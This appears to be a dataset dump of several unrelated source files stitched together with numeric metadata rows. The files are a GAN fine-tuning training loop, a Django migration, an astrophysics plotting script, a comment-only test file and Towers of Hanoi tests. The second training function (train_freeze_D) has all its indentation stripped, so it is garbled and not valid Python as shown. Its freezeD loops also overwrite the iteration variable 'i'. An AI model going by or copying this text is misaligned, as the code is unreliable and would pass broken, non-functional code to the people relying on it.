    loss_dict = {}

    # unwrap DistributedDataParallel so state_dict keys are consistent
    if args.distributed:
        g_module = generator.module
        d_module = discriminator.module
    else:
        g_module = generator
        d_module = discriminator

    # EMA decay for g_ema (half-life of 10k images at batch 32)
    accum = 0.5 ** (32 / (10 * 1000))

    # ADA state: [sum of sign(real_pred), number of predictions]
    ada_augment = torch.tensor([0.0, 0.0], device=device)
    ada_aug_p = args.augment_p if args.augment_p > 0 else 0.0
    ada_aug_step = args.ada_target / args.ada_length
    r_t_stat = 0

    # fixed latents used for the periodic sample grid
    sample_z = torch.randn(args.n_sample, args.latent, device=device)

    # freeze the entire generator up front; the loop re-enables only the
    # layers that are being fine-tuned
    requires_grad(generator, False)

    for idx in pbar:
        i = idx + args.start_iter

        if i > args.iter:
            print("Done!")

            break

        # update D
        real_img = next(loader)
        real_img = real_img.to(device)

        if args.finetune_loc <= 0:
            requires_grad(generator, False)
        else:
            # re-freeze the fine-tuned generator layers (they were enabled in
            # the previous G phase); counting from the network's output end
            for loc in range(args.finetune_loc):
                requires_grad(generator, False, target_layer=f'convs.{generator.num_layers-2-2*loc}')
                requires_grad(generator, False, target_layer=f'convs.{generator.num_layers-3-2*loc}')
                requires_grad(generator, False, target_layer=f'to_rgbs.{generator.log_size-3-loc}')
        requires_grad(discriminator, True)

        noise = mixing_noise(args.batch, args.latent, args.mixing, device)
        fake_img, _ = generator(noise)

        if args.augment:
            real_img_aug, _ = augment(real_img, ada_aug_p)
            fake_img, _ = augment(fake_img, ada_aug_p)
        else:
            real_img_aug = real_img

        fake_pred = discriminator(fake_img)
        real_pred = discriminator(real_img_aug)
        d_loss = d_logistic_loss(real_pred, fake_pred)

        loss_dict["d"] = d_loss
        loss_dict["real_score"] = real_pred.mean()
        loss_dict["fake_score"] = fake_pred.mean()

        discriminator.zero_grad()
        d_loss.backward()
        d_optim.step()

        # ADA: adjust augmentation probability toward args.ada_target based on
        # the sign of the discriminator's real predictions (only when no fixed
        # augment_p was given)
        if args.augment and args.augment_p == 0:
            ada_augment += torch.tensor(
                (torch.sign(real_pred).sum().item(), real_pred.shape[0]), device=device
            )
            ada_augment = reduce_sum(ada_augment)

            # update every ~256 accumulated predictions
            if ada_augment[1] > 255:
                pred_signs, n_pred = ada_augment.tolist()

                r_t_stat = pred_signs / n_pred

                if r_t_stat > args.ada_target:
                    sign = 1
                else:
                    sign = -1

                ada_aug_p += sign * ada_aug_step * n_pred
                ada_aug_p = min(1, max(0, ada_aug_p))
                ada_augment.mul_(0)

        # lazy R1 regularization on real images
        d_regularize = i % args.d_reg_every == 0

        if d_regularize:
            real_img.requires_grad = True
            real_pred = discriminator(real_img)
            r1_loss = d_r1_loss(real_pred, real_img)

            discriminator.zero_grad()
            # the "+ 0 * real_pred[0]" term keeps all D outputs in the graph
            # so DDP does not complain about unused parameters
            (args.r1 / 2 * r1_loss * args.d_reg_every + 0 * real_pred[0]).backward()

            d_optim.step()

        loss_dict["r1"] = r1_loss

        # update G
        if args.finetune_loc <= 0:
            requires_grad(generator, True)
        else:
            # enable gradients only on the fine-tuned generator layers
            for loc in range(args.finetune_loc):
                requires_grad(generator, True, target_layer=f'convs.{generator.num_layers-2-2*loc}')
                requires_grad(generator, True, target_layer=f'convs.{generator.num_layers-3-2*loc}')
                requires_grad(generator, True, target_layer=f'to_rgbs.{generator.log_size-3-loc}')
        requires_grad(discriminator, False)

        noise = mixing_noise(args.batch, args.latent, args.mixing, device)
        fake_img, _ = generator(noise)

        if args.augment:
            fake_img, _ = augment(fake_img, ada_aug_p)

        fake_pred = discriminator(fake_img)
        g_loss = g_nonsaturating_loss(fake_pred)

        loss_dict["g"] = g_loss

        generator.zero_grad()
        g_loss.backward()
        g_optim.step()

        # lazy path-length regularization
        g_regularize = i % args.g_reg_every == 0

        # NOTE(review): `< 0` skips path regularization for finetune_loc == 0,
        # although the G update above treats 0 like the "full generator" case
        # (`<= 0`) — confirm this asymmetry is intentional
        if args.finetune_loc < 0 and g_regularize:
            # shrink the batch for the path penalty to save memory
            path_batch_size = max(1, args.batch // args.path_batch_shrink)
            noise = mixing_noise(path_batch_size, args.latent, args.mixing, device)
            fake_img, latents = generator(noise, return_latents=True)

            path_loss, mean_path_length, path_lengths = g_path_regularize(
                fake_img, latents, mean_path_length
            )

            generator.zero_grad()
            weighted_path_loss = args.path_regularize * args.g_reg_every * path_loss

            # tie one output pixel into the graph (DDP unused-parameter guard)
            if args.path_batch_shrink:
                weighted_path_loss += 0 * fake_img[0, 0, 0, 0]

            weighted_path_loss.backward()

            g_optim.step()

            mean_path_length_avg = (
                reduce_sum(mean_path_length).item() / get_world_size()
            )

        loss_dict["path"] = path_loss
        loss_dict["path_length"] = path_lengths.mean()

        # EMA of generator weights for evaluation/sampling
        accumulate(g_ema, g_module, accum)

        # average losses across ranks for logging
        loss_reduced = reduce_loss_dict(loss_dict)

        d_loss_val = loss_reduced["d"].mean().item()
        g_loss_val = loss_reduced["g"].mean().item()
        r1_val = loss_reduced["r1"].mean().item()
        path_loss_val = loss_reduced["path"].mean().item()
        real_score_val = loss_reduced["real_score"].mean().item()
        fake_score_val = loss_reduced["fake_score"].mean().item()
        path_length_val = loss_reduced["path_length"].mean().item()

        if get_rank() == 0:
            pbar.set_description(
                (
                    f"d: {d_loss_val:.4f}; g: {g_loss_val:.4f}; r1: {r1_val:.4f}; "
                    f"path: {path_loss_val:.4f}; mean path: {mean_path_length_avg:.4f}; "
                    f"augment: {ada_aug_p:.4f}"
                )
            )

            # periodic sample grid from the EMA generator
            if i % 1000 == 0:
                torch.cuda.empty_cache()

                with torch.no_grad():
                    g_ema.eval()
                    sample, _ = g_ema([sample_z])
                    utils.save_image(
                        sample,
                        f"sample/{str(i).zfill(6)}.png",
                        nrow=int(args.n_sample ** 0.5),
                        normalize=True,
                        # NOTE(review): `range=` was renamed `value_range=` in
                        # newer torchvision — confirm the pinned version
                        range=(-1, 1),
                    )

                torch.cuda.empty_cache()

            # periodic full checkpoint
            if i % 10000 == 0:
                torch.save(
                    {
                        "g": g_module.state_dict(),
                        "d": d_module.state_dict(),
                        "g_ema": g_ema.state_dict(),
                        "g_optim": g_optim.state_dict(),
                        "d_optim": d_optim.state_dict(),
                        "args": args,
                        "ada_aug_p": ada_aug_p,
                    },
                    f"checkpoint/{str(i).zfill(6)}.pt",
                )
def train_freeze_D(
args,
loader,
generator,
discriminator,
g_optim,
d_optim,
g_ema,
device
):
loader = sample_data(loader)
pbar = range(args.iter)
if get_rank() == 0:
pbar = tqdm(pbar, initial=args.start_iter, dynamic_ncols=True, smoothing=0.01)
mean_path_length = 0
d_loss_val = 0
r1_loss = torch.tensor(0.0, device=device)
g_loss_val = 0
path_loss = torch.tensor(0.0, device=device)
path_lengths = torch.tensor(0.0, device=device)
mean_path_length_avg = 0
loss_dict = {}
if args.distributed:
g_module = generator.module
d_module = discriminator.module
else:
g_module = generator
d_module = discriminator
accum = 0.5 ** (32 / (10 * 1000))
ada_augment = torch.tensor([0.0, 0.0], device=device)
ada_aug_p = args.augment_p if args.augment_p > 0 else 0.0
ada_aug_step = args.ada_target / args.ada_length
r_t_stat = 0
sample_z = torch.randn(args.n_sample, args.latent, device=device)
requires_grad(generator, False)
for idx in pbar:
i = idx + args.start_iter
if i > args.iter:
print("Done!")
break
# update D
real_img = next(loader)
real_img = real_img.to(device)
requires_grad(generator, False)
if args.freezeD:
for i in range(args.training_features):
requires_grad(discriminator, True, target_layer=f'convs.{6-i}')
requires_grad(discriminator, True, target_layer=f'final_')
else:
requires_grad(discriminator, True)
noise = mixing_noise(args.batch, args.latent, args.mixing, device)
fake_img, _ = generator(noise)
if args.augment:
real_img_aug, _ = augment(real_img, ada_aug_p)
fake_img, _ = augment(fake_img, ada_aug_p)
else:
real_img_aug = real_img
fake_pred = discriminator(fake_img)
real_pred = discriminator(real_img_aug)
d_loss = d_logistic_loss(real_pred, fake_pred)
loss_dict["d"] = d_loss
loss_dict["real_score"] = real_pred.mean()
loss_dict["fake_score"] = fake_pred.mean()
discriminator.zero_grad()
d_loss.backward()
d_optim.step()
if args.augment and args.augment_p == 0:
ada_augment += torch.tensor(
(torch.sign(real_pred).sum().item(), real_pred.shape[0]), device=device
)
ada_augment = reduce_sum(ada_augment)
if ada_augment[1] > 255:
pred_signs, n_pred = ada_augment.tolist()
r_t_stat = pred_signs / n_pred
if r_t_stat > args.ada_target:
sign = 1
else:
sign = -1
ada_aug_p += sign * ada_aug_step * n_pred
ada_aug_p = min(1, max(0, ada_aug_p))
ada_augment.mul_(0)
d_regularize = i % args.d_reg_every == 0
if d_regularize:
real_img.requires_grad = True
real_pred = discriminator(real_img)
r1_loss = d_r1_loss(real_pred, real_img)
discriminator.zero_grad()
(args.r1 / 2 * r1_loss * args.d_reg_every + 0 * real_pred[0]).backward()
d_optim.step()
loss_dict["r1"] = r1_loss
# update G
requires_grad(generator, True)
if args.freezeD:
for i in range(args.training_features):
requires_grad(discriminator, False, target_layer=f'convs.{6-i}')
requires_grad(discriminator, False, target_layer=f'final_')
else:
requires_grad(discriminator, False)
noise = mixing_noise(args.batch, args.latent, args.mixing, device)
fake_img, _ = generator(noise)
if args.augment:
fake_img, _ = augment(fake_img, ada_aug_p)
fake_pred = discriminator(fake_img)
g_loss = g_nonsaturating_loss(fake_pred)
loss_dict["g"] = g_loss
generator.zero_grad()
g_loss.backward()
g_optim.step()
g_regularize = i % args.g_reg_every == 0
if args.finetune_loc < 0 and g_regularize:
path_batch_size = max(1, args.batch // args.path_batch_shrink)
noise = mixing_noise(path_batch_size, args.latent, args.mixing, device)
fake_img, latents = generator(noise, return_latents=True)
path_loss, mean_path_length, path_lengths = g_path_regularize(
fake_img, latents, mean_path_length
)
generator.zero_grad()
weighted_path_loss = args.path_regularize * args.g_reg_every * path_loss
if args.path_batch_shrink:
weighted_path_loss += 0 * fake_img[0, 0, 0, 0]
weighted_path_loss.backward()
g_optim.step()
mean_path_length_avg = (
reduce_sum(mean_path_length).item() / get_world_size()
)
loss_dict["path"] = path_loss
loss_dict["path_length"] = path_lengths.mean()
accumulate(g_ema, g_module, accum)
loss_reduced = reduce_loss_dict(loss_dict)
d_loss_val = loss_reduced["d"].mean().item()
g_loss_val = loss_reduced["g"].mean().item()
r1_val = loss_reduced["r1"].mean().item()
path_loss_val = loss_reduced["path"].mean().item()
real_score_val = loss_reduced["real_score"].mean().item()
fake_score_val = loss_reduced["fake_score"].mean().item()
path_length_val = loss_reduced["path_length"].mean().item()
if get_rank() == 0:
pbar.set_description(
(
f"d: {d_loss_val:.4f}; g: {g_loss_val:.4f}; r1: {r1_val:.4f}; "
f"path: {path_loss_val:.4f}; mean path: {mean_path_length_avg:.4f}; "
f"augment: {ada_aug_p:.4f}"
)
)
if i % 1000 == 0:
torch.cuda.empty_cache()
with torch.no_grad():
g_ema.eval()
sample, _ = g_ema([sample_z])
utils.save_image(
sample,
f"sample/{str(i).zfill(6)}.png",
nrow=int(args.n_sample ** 0.5),
normalize=True,
range=(-1, 1),
)
torch.cuda.empty_cache()
if i % 10000 == 0:
torch.save(
{
"g": g_module.state_dict(),
"d": d_module.state_dict(),
"g_ema": g_ema.state_dict(),
"g_optim": g_optim.state_dict(),
"d_optim": d_optim.state_dict(),
"args": args,
"ada_aug_p": ada_aug_p,
},
f"checkpoint/{str(i).zfill(6)}.pt",
| 32.045952
| 101
| 0.550222
| 1,833
| 14,645
| 4.072559
| 0.085106
| 0.01929
| 0.018754
| 0.013932
| 0.967314
| 0.963831
| 0.963831
| 0.96142
| 0.945345
| 0.932351
| 0
| 0.020189
| 0.343872
| 14,645
| 457
| 102
| 32.045952
| 0.756686
| 0
| 0
| 0.892128
| 0
| 0.005831
| 0.061583
| 0.026334
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017493
| null | null | 0.005831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f1904ec483369ca7bb18409a7123d81d2d52ac34
| 4,352
|
py
|
Python
|
LiquorStore/migrations/0001_initial.py
|
CPU-sangoma/PlentyPot
|
27e326f61e57746f5ca6701358d86c01b4a9ee31
|
[
"MIT"
] | null | null | null |
LiquorStore/migrations/0001_initial.py
|
CPU-sangoma/PlentyPot
|
27e326f61e57746f5ca6701358d86c01b4a9ee31
|
[
"MIT"
] | null | null | null |
LiquorStore/migrations/0001_initial.py
|
CPU-sangoma/PlentyPot
|
27e326f61e57746f5ca6701358d86c01b4a9ee31
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-12-07 02:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('profiles', '0024_auto_20191205_1832'),
]
operations = [
migrations.CreateModel(
name='LiquorSalesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sale1', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='1st sale item')),
('sale2', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='2nd sale item')),
('sale3', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='3rd sale item')),
('sale4', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='4th sale item')),
('sale5', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='5th sale item')),
('sale6', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='6th sale item')),
('sale7', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='7th sale item')),
('sale8', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='8th sale item')),
('company', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='profiles.BusinessProfile')),
],
),
migrations.CreateModel(
name='LiquorHomePageModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bannerImage', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='upload a big banner Image for your Home Page')),
('beer1', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='first pic under beers and cider')),
('beer2', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='second pic under beers and cider')),
('beer3', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='third pic under beers and cider')),
('beer4', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='fourth pic under beers and cider')),
('beer5', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='fifth pic under beers and cider')),
('beer7', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='7th pic under beers and cider')),
('beer8', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='8th pic under beers and cider')),
('bottle1', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='first pic under spirits and Vodkas')),
('bottle2', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='second pic under spirits and Vodkas')),
('bottle3', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='third pic under spirits and Vodkas')),
('bottle4', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='fourth pic under spirits and Vodkas')),
('bottle5', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='first pic under spirits and Vodkas')),
('bottle6', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='sixth pic under spirits and Vodkas')),
('bottle7', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='7th pic under spirits and Vodkas')),
('bottle8', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='8th pic under spirits and Vodkas')),
('company', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='liquorhome', to='profiles.BusinessProfile')),
],
),
]
| 79.127273
| 160
| 0.66682
| 490
| 4,352
| 5.8
| 0.222449
| 0.100633
| 0.168895
| 0.202674
| 0.78114
| 0.709711
| 0.709711
| 0.709711
| 0.709711
| 0.709711
| 0
| 0.018782
| 0.192555
| 4,352
| 54
| 161
| 80.592593
| 0.789983
| 0.01034
| 0
| 0.212766
| 1
| 0
| 0.34216
| 0.144715
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042553
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74136215696e672e55af6bed198388eacc97e82c
| 6,522
|
py
|
Python
|
plot_thes.py
|
tdaylan/tdgu
|
824aaad9e93f30cacee365d76819962885e1dad7
|
[
"MIT"
] | null | null | null |
plot_thes.py
|
tdaylan/tdgu
|
824aaad9e93f30cacee365d76819962885e1dad7
|
[
"MIT"
] | null | null | null |
plot_thes.py
|
tdaylan/tdgu
|
824aaad9e93f30cacee365d76819962885e1dad7
|
[
"MIT"
] | null | null | null |
from __init__ import *
from scipy import signal
pathbase = os.environ["TDGU_DATA_PATH"] + '/plot_thes/'
figr, axis = plt.subplots(figsize=(6, 6))
# data
path = pathbase + 'vdisdark_mean.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
path = pathbase + 'vdisdark_mean.csv'
ydatdata = loadtxt(path, delimiter=',')[:, 1]
yerrdata = empty((2, xdatdata.size))
path = pathbase + 'vdisdark_lowr.csv'
yerrdata[0, :] = ydatdata - loadtxt(path, delimiter=',')[:, 1]
path = pathbase + 'vdisdark_uppr.csv'
yerrdata[1, :] = loadtxt(path, delimiter=',')[:, 1] - ydatdata
temp, listcaps, temp = axis.errorbar(xdatdata, ydatdata, yerrdata, color='black', ls='', marker='o', lw=1, capsize=5, markersize=5)
for caps in listcaps:
caps.set_markeredgewidth(1)
# models
path = pathbase + 'vdisdark_0000.csv'
xdat = loadtxt(path, delimiter=',')[:, 0]
ydat = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdat, ydat, ls='-')
path = pathbase + 'vdisdark_0001.csv'
xdat = loadtxt(path, delimiter=',')[:, 0]
ydat = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdat, ydat, ls='-')
path = pathbase + 'vdisdark_0002.csv'
xdat = loadtxt(path, delimiter=',')[:, 0]
ydat = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdat, ydat, ls='-')
axis.set_xlabel('$r$ [kpc]')
axis.set_ylabel('$v$ [km s$^{-1}$]')
path = pathbase + 'vdisdark.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Bhupal-Dev (2013)
figr, axis = plt.subplots(figsize=(6, 6))
# data
path = pathbase + 'Bhupal-Dev2013_fo_lowr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Bhupal-Dev2013_fo_medi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Bhupal-Dev2013_fo_uppr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Bhupal-Dev2013_fo_equi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1, color='black')
axis.set_xlabel('$m_{\chi}/T$')
axis.set_ylabel('$\Omega_{\chi} h^2$')
path = pathbase + 'csecdark.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Markovic (2014)
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Markovic2014_lcdm.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1, color='black')
path = pathbase + 'Markovic2014_lowr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Markovic2014_medi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Markovic2014_uppr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
axis.set_xlabel('$k$ [$h$/Mpc]')
axis.set_ylabel('$P(k)$ [(Mpc/$h$)$^3$]')
path = pathbase + 'psecwarm.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Abazajian (2013)
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Abazajian2013/lowr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], ydatdata[indx], lw=1)
path = pathbase + 'Abazajian2013/medi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], ydatdata[indx], lw=1, alpha=0.5)
ydatdata = sp.signal.savgol_filter(ydatdata, 51, 3)
axis.plot(xdatdata[indx], ydatdata[indx], lw=1, alpha=0.5)
path = pathbase + 'Abazajian2013/uppr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], ydatdata[indx], lw=1)
axis.set_xscale('log')
axis.set_xlabel('$k$ [$h$/Mpc]')
axis.set_ylabel('$T(k)$')
path = pathbase + 'psecneut.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Daylan (2016) -- spec
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Daylan2016_spec/modl.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], 1e6 * ydatdata[indx], lw=2)
path = pathbase + 'Daylan2016_spec/data_mean.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
yerrdata = empty((2, xdatdata.size))
path = pathbase + 'Daylan2016_spec/data_lowr.csv'
yerrdata[0, :] = ydatdata - loadtxt(path, delimiter=',')[:, 1]
path = pathbase + 'Daylan2016_spec/data_uppr.csv'
yerrdata[1, :] = loadtxt(path, delimiter=',')[:, 1] - ydatdata
temp, listcaps, temp = axis.errorbar(xdatdata, 1e6 * ydatdata, 1e6 * yerrdata, color='black', ls='', marker='o', lw=1, capsize=5, markersize=5)
for caps in listcaps:
caps.set_markeredgewidth(1)
axis.set_xscale('log')
axis.set_xlabel('$E$ [GeV]')
axis.set_ylabel('$E^2dI/dE$ [10$^{-6}$ GeV cm$^{-2}$ s$^{-1}$ sr$^{-1}$]')
path = pathbase + 'specgeve.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Daylan (2016) -- morp
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Daylan2016_morp/modl.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], 1e6 * ydatdata[indx], lw=2)
path = pathbase + 'Daylan2016_morp/data_mean.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
yerrdata = empty((2, xdatdata.size))
path = pathbase + 'Daylan2016_morp/data_lowr.csv'
yerrdata[0, :] = ydatdata - loadtxt(path, delimiter=',')[:, 1]
path = pathbase + 'Daylan2016_morp/data_uppr.csv'
yerrdata[1, :] = loadtxt(path, delimiter=',')[:, 1] - ydatdata
temp, listcaps, temp = axis.errorbar(xdatdata, 1e6 * ydatdata, 1e6 * yerrdata, color='black', ls='', marker='o', lw=1, capsize=5, markersize=5)
for caps in listcaps:
caps.set_markeredgewidth(1)
axis.set_yscale('log')
axis.set_xlabel(r'$\Psi$ [deg]')
axis.set_ylabel('$E^2dI/dE$ [10$^{-6}$ GeV cm$^{-2}$ s$^{-1}$ sr$^{-1}$]')
path = pathbase + 'morpgeve.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
| 29.780822
| 143
| 0.66958
| 884
| 6,522
| 4.864253
| 0.13914
| 0.112558
| 0.204651
| 0.122093
| 0.874419
| 0.857209
| 0.857209
| 0.846047
| 0.835349
| 0.802326
| 0
| 0.040984
| 0.120822
| 6,522
| 218
| 144
| 29.917431
| 0.708929
| 0.017019
| 0
| 0.712418
| 0
| 0.013072
| 0.159063
| 0.074375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013072
| 0
| 0.013072
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7774c69e5876bc4fa493448880ace9ae2cdcebdd
| 511
|
py
|
Python
|
tests/test_generators.py
|
juanelenter/mseqgen
|
7e59af9e3a86f61a2664314755b012568cf67f28
|
[
"MIT"
] | 1
|
2021-05-26T03:44:43.000Z
|
2021-05-26T03:44:43.000Z
|
tests/test_generators.py
|
juanelenter/mseqgen
|
7e59af9e3a86f61a2664314755b012568cf67f28
|
[
"MIT"
] | 3
|
2021-06-27T23:29:56.000Z
|
2022-01-13T17:32:55.000Z
|
tests/test_generators.py
|
juanelenter/mseqgen
|
7e59af9e3a86f61a2664314755b012568cf67f28
|
[
"MIT"
] | 2
|
2020-07-02T16:54:16.000Z
|
2021-05-20T03:02:46.000Z
|
# test_single_task_stranded_with_controls_peaks
# test_single_task_stranded_with_controls_sequential
# test_single_task_stranded_with_controls_random
# test_single_task_stranded_without_controls_peaks
# test_single_task_unstranded_with_controls_peaks
# test_single_task_unstranded_without_controls_peaks
# test_multi_task_stranded_with_controls_peaks
# test_multi_task_stranded_without_controls_peaks
# test_multi_task_unstranded_with_controls_peaks
# test_multi_task_unstranded_without_controls_peaks
| 25.55
| 52
| 0.923679
| 70
| 511
| 5.885714
| 0.171429
| 0.252427
| 0.288835
| 0.213592
| 0.936893
| 0.88835
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056751
| 511
| 19
| 53
| 26.894737
| 0.854772
| 0.941292
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
778801e17eb72f75d8b508c90b2fa77bea9740af
| 592
|
py
|
Python
|
challanges/towers_of_hanoi/test_towers_of_hanoi.py
|
Patricia888/data-structures-and-algorithms
|
8963acf857b9f7069eeeea2884b41376986c3d7c
|
[
"MIT"
] | null | null | null |
challanges/towers_of_hanoi/test_towers_of_hanoi.py
|
Patricia888/data-structures-and-algorithms
|
8963acf857b9f7069eeeea2884b41376986c3d7c
|
[
"MIT"
] | null | null | null |
challanges/towers_of_hanoi/test_towers_of_hanoi.py
|
Patricia888/data-structures-and-algorithms
|
8963acf857b9f7069eeeea2884b41376986c3d7c
|
[
"MIT"
] | null | null | null |
from .towers_of_hanoi import towers_of_hanoi
def test_towers_of_hanoi_with_2_disks():
'''test with 2 disks'''
assert towers_of_hanoi(2) == (3, [2, 1], [], [])
def test_towers_of_hanoi_with_3_disks():
"""test with 3 disks"""
assert towers_of_hanoi(3) == (7, [3, 2, 1], [], [])
def test_towers_of_hanoi_with_7_disks():
"""test with 7 disks"""
assert towers_of_hanoi(7) == (127, [7, 6, 5, 4, 3, 2, 1], [], [])
def test_towers_of_hanoi_with_10_disks():
"""test with 10 disks"""
assert towers_of_hanoi(10) == (1023, [10, 9, 8, 7, 6, 5, 4, 3, 2, 1], [], [])
| 26.909091
| 81
| 0.613176
| 102
| 592
| 3.205882
| 0.215686
| 0.244648
| 0.397554
| 0.183486
| 0.648318
| 0.35474
| 0.281346
| 0.247706
| 0.247706
| 0
| 0
| 0.098326
| 0.192568
| 592
| 21
| 82
| 28.190476
| 0.585774
| 0.121622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 1
| 0.444444
| true
| 0
| 0.111111
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
